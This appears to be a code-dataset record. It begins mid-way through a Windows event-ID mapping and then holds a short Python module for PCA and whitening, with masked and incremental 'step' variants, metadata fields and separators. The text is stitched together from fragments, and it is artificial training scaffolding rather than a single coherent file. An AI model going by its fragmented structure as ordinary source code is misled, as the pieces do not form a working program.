u'EVENT_OBJECT_HIDE',\n 0x8004: u'EVENT_OBJECT_REORDER',\n 0x8005: u'EVENT_OBJECT_FOCUS',\n 0x8006: u'EVENT_OBJECT_SELECTION',\n 0x8007: u'EVENT_OBJECT_SELECTIONADD',\n 0x8008: u'EVENT_OBJECT_SELECTIONREMOVE',\n 0x8009: u'EVENT_OBJECT_SELECTIONWITHIN',\n 0x800a: u'EVENT_OBJECT_STATECHANGE',\n 0x800b: u'EVENT_OBJECT_LOCATIONCHANGE',\n 0x800c: u'EVENT_OBJECT_NAMECHANGE',\n 0x800d: u'EVENT_OBJECT_DESCRIPTIONCHANGE',\n 0x800e: u'EVENT_OBJECT_VALUECHANGE',\n 0x800f: u'EVENT_OBJECT_PARENTCHANGE',\n 0x8010: u'EVENT_OBJECT_HELPCHANGE',\n 0x8011: u'EVENT_OBJECT_DEFACTIONCHANGE',\n 0x8012: u'EVENT_OBJECT_ACCELERATORCHANGE'}\n\n\nwinEventIDsToEventNames={}\n\nfor _sym, _val in locals().items():\n if _sym.startswith('EVENT_') or _sym.startswith('IA2_EVENT_'):\n winEventIDsToEventNames[_val] = _sym\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt  #pyplot, not the bare matplotlib package
import scipy.linalg
from distance_metrics import *  #local project module
import time
import random

RANDOM_SEED = 42
np.random.seed(RANDOM_SEED)
random.seed(RANDOM_SEED)

################################################################
		# PCA #
################################################################

def project(X, U, p = None):
    #Project X onto the eigenbasis U; keep the first p components,
    #replace the trailing ones by their column means, then reconstruct.
    if p is None: p = X.shape[1]
    Z = np.matmul(X, U)  #coordinates in the eigenbasis
    Z[:, p:] = np.mean(Z[:, p:], axis = 0)  #discard trailing components
    X2 = np.matmul(Z, U.transpose())  #reconstruction in the input space
    return (Z, X2)

def PCA(X, threshold = 0.9):
    X2 = X - np.mean(X, axis = 0)  #center the data
    S = np.matmul(X2.transpose(), X2)  #scatter matrix (covariance up to a 1/(n-1) factor)
    [W,U] = np.linalg.eigh(S)  #eigenvectors in columns, eigenvalues ascending
    W = np.flip(W, axis = 0)  #reorder to descending
    U = np.flip(U, axis = 1)
    validity = np.cumsum(W)/np.sum(W)  #fraction of variance explained by the first i+1 eigenvalues
    p = np.argmax(validity>=threshold) + 1
    if p<=1 or threshold == 1: p = X.shape[1]
    [Z, X3] = project(X, U, p)
    #Projection, number of kept components, Reconstruction, EigenVectors, EigenValues
    return [Z, p, X3, U, W]

################################################################
		# Whitening #
################################################################

def whiteningTransform(X, W, U):
    #Z = Lambda^(-1/2) U^T (X - mean)^T, transposed back to (n_samples, n_features);
    #afterwards Z^T Z is (approximately) the identity.
    L = np.diag(W)
    Z = np.transpose(np.matmul(np.matmul(scipy.linalg.fractional_matrix_power(L, -0.5), U.transpose()), (X - np.mean(X, axis = 0)).transpose()))
    return Z
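
# --- Minimal usage sketch (an illustrative addition, not part of the
# original module): assumes X is an (n_samples, n_features) float array
# and that the eigenvalues W returned by PCA are strictly positive. ---
if __name__ == "__main__":
    X_demo = np.random.randn(100, 5)
    Z, p, X_rec, U, W = PCA(X_demo, threshold = 0.9)
    X_white = whiteningTransform(X_demo, W, U)
    print("kept components:", p)
    print("reconstruction error:", np.linalg.norm(X_demo - X_rec))
    #Since W are scatter-matrix eigenvalues, X_white^T X_white is ~identity:
    print(np.matmul(X_white.transpose(), X_white))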
|
normal
|
{
"blob_id": "c00db6d6fd903236de37ccc029ed30fd46dccdef",
"index": 7711,
"step-1": "<mask token>\n\n\ndef project(X, U, p=None):\n if p == None:\n p = X.shape[1]\n Z = np.matmul(X, U)\n Z[:, p:] = np.mean(Z[:, p:], axis=0)\n X2 = np.matmul(Z, U.transpose())\n return Z, X2\n\n\n<mask token>\n\n\ndef whiteningTransform(X, W, U):\n L = np.diag(W)\n Z = np.transpose(np.matmul(np.matmul(scipy.linalg.\n fractional_matrix_power(L, -0.5), U.transpose()), (X - np.mean(X,\n axis=0)).transpose()))\n return Z\n",
"step-2": "<mask token>\nnp.random.seed(RANDOM_SEED)\nrandom.seed(RANDOM_SEED)\n\n\ndef project(X, U, p=None):\n if p == None:\n p = X.shape[1]\n Z = np.matmul(X, U)\n Z[:, p:] = np.mean(Z[:, p:], axis=0)\n X2 = np.matmul(Z, U.transpose())\n return Z, X2\n\n\ndef PCA(X, threshold=0.9):\n X2 = X - np.mean(X, axis=0)\n S = np.matmul(X2.transpose(), X2)\n [W, U] = np.linalg.eigh(S)\n W = np.flip(W, axis=0)\n U = np.flip(U, axis=1)\n validity = np.cumsum(W) / np.sum(W)\n p = np.argmax(validity >= threshold) + 1\n if p <= 1 or threshold == 1:\n p = X.shape[1]\n [Z, X3] = project(X, U, p)\n return [Z, p, X3, U, W]\n\n\ndef whiteningTransform(X, W, U):\n L = np.diag(W)\n Z = np.transpose(np.matmul(np.matmul(scipy.linalg.\n fractional_matrix_power(L, -0.5), U.transpose()), (X - np.mean(X,\n axis=0)).transpose()))\n return Z\n",
"step-3": "<mask token>\nRANDOM_SEED = 42\nnp.random.seed(RANDOM_SEED)\nrandom.seed(RANDOM_SEED)\n\n\ndef project(X, U, p=None):\n if p == None:\n p = X.shape[1]\n Z = np.matmul(X, U)\n Z[:, p:] = np.mean(Z[:, p:], axis=0)\n X2 = np.matmul(Z, U.transpose())\n return Z, X2\n\n\ndef PCA(X, threshold=0.9):\n X2 = X - np.mean(X, axis=0)\n S = np.matmul(X2.transpose(), X2)\n [W, U] = np.linalg.eigh(S)\n W = np.flip(W, axis=0)\n U = np.flip(U, axis=1)\n validity = np.cumsum(W) / np.sum(W)\n p = np.argmax(validity >= threshold) + 1\n if p <= 1 or threshold == 1:\n p = X.shape[1]\n [Z, X3] = project(X, U, p)\n return [Z, p, X3, U, W]\n\n\ndef whiteningTransform(X, W, U):\n L = np.diag(W)\n Z = np.transpose(np.matmul(np.matmul(scipy.linalg.\n fractional_matrix_power(L, -0.5), U.transpose()), (X - np.mean(X,\n axis=0)).transpose()))\n return Z\n",
"step-4": "import numpy as np\nimport pandas as pd\nimport matplotlib as plt\nimport scipy.linalg\nfrom distance_metrics import *\nimport time\nimport random\nRANDOM_SEED = 42\nnp.random.seed(RANDOM_SEED)\nrandom.seed(RANDOM_SEED)\n\n\ndef project(X, U, p=None):\n if p == None:\n p = X.shape[1]\n Z = np.matmul(X, U)\n Z[:, p:] = np.mean(Z[:, p:], axis=0)\n X2 = np.matmul(Z, U.transpose())\n return Z, X2\n\n\ndef PCA(X, threshold=0.9):\n X2 = X - np.mean(X, axis=0)\n S = np.matmul(X2.transpose(), X2)\n [W, U] = np.linalg.eigh(S)\n W = np.flip(W, axis=0)\n U = np.flip(U, axis=1)\n validity = np.cumsum(W) / np.sum(W)\n p = np.argmax(validity >= threshold) + 1\n if p <= 1 or threshold == 1:\n p = X.shape[1]\n [Z, X3] = project(X, U, p)\n return [Z, p, X3, U, W]\n\n\ndef whiteningTransform(X, W, U):\n L = np.diag(W)\n Z = np.transpose(np.matmul(np.matmul(scipy.linalg.\n fractional_matrix_power(L, -0.5), U.transpose()), (X - np.mean(X,\n axis=0)).transpose()))\n return Z\n",
"step-5": "import numpy as np\nimport pandas as pd\nimport matplotlib as plt\nimport scipy.linalg\nfrom distance_metrics import *\n\nimport time\nimport random\nRANDOM_SEED = 42\nnp.random.seed(RANDOM_SEED)\nrandom.seed(RANDOM_SEED)\n\n\n\n################################################################\n\t\t# PCA #\n################################################################\n\ndef project(X, U, p = None):\n if p == None: p = X.shape[1]\n Z = np.matmul(X, U)\n Z[:, p:] = np.mean(Z[:, p:], axis = 0)\n X2 = np.matmul(Z, U.transpose())\n return (Z, X2)\ndef PCA(X, threshold = 0.9):\n X2 = X - np.mean(X, axis = 0)\n S = np.matmul(X2.transpose(), X2) #Covariance Matrix\n [W,U] = np.linalg.eigh(S) #eigen vectors in columns\n W = np.flip(W, axis = 0)\n U = np.flip(U, axis = 1)\n \n validity = np.cumsum(W)/np.sum(W) #represents validity of choosing first i+1 eigenvalues\n p = np.argmax(validity>=threshold) + 1\n \n if p<=1 or threshold == 1: p = X.shape[1]\n \n [Z, X3] = project(X, U, p)\n \n #Projection, P, Reconstruction, EigenVectors, EigenValues\n return [Z, p, X3, U, W]\n\n################################################################\n\t\t# Whitening #\n################################################################\n\ndef whiteningTransform(X, W, U):\n\tL = np.diag(W)\n\tZ = np.transpose(np.matmul(np.matmul(scipy.linalg.fractional_matrix_power(L, -0.5), U.transpose()), (X - np.mean(X, axis = 0)).transpose()))\n\treturn Z\n",
"step-ids": [
2,
4,
5,
6,
7
]
}
|
[
2,
4,
5,
6,
7
] |